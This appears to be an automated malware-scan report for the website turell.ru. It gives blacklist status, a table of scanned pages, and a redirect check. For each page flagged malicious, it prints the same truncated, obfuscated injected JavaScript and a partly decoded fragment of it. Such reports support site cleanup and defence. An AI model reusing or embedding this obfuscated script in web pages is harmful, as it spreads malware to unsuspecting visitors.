Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turell.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turell.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://turell.ru/ | 200 OK Content-Length: 30704 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/wp-content/themes/Semantic/menu/mootools-1.2.5-core-yc.js | 200 OK Content-Length: 66798 Content-Type: text/javascript | clean |
http://turell.ru/wp-content/themes/Semantic/menu/MenuMatic_0.68.3.js | 200 OK Content-Length: 25860 Content-Type: text/javascript | clean |
http://turell.ru/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://turell.ru/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.50 | 200 OK Content-Length: 3018 Content-Type: text/javascript | clean |
http://turell.ru/sitemap.html | 200 OK Content-Length: 30724 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/feed | 200 OK Content-Length: 56663 Content-Type: text/xml | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/novosti/the-wolf-among-us-chast-tretya-vpechatleniya-ot-reliza.html/attachment/maxresdefault-6 | 200 OK Content-Length: 25290 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/starcraft-2 | 200 OK Content-Length: 37769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/interesnye-fakty | 200 OK Content-Length: 34235 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/novosti | 200 OK Content-Length: 36878 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/sovety-gejmerov | 200 OK Content-Length: 35823 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/stati | 200 OK Content-Length: 38130 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://turell.ru/sc2/replays.php | 200 OK Content-Length: 32706 Content-Type: text/html | clean |
http://turell.ru/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: turell.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 04:22:41 GMT
Server: Apache/2.2.15 (Cloud Linux)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://turell.ru/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: turell.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 04:22:41 GMT
Server: Apache/2.2.15 (Cloud Linux)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://turell.ru/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: turell.ru
Referer: http://www.google.com/search?q=turell.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: turell.ru
Referer: http://www.google.com/search?q=turell.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.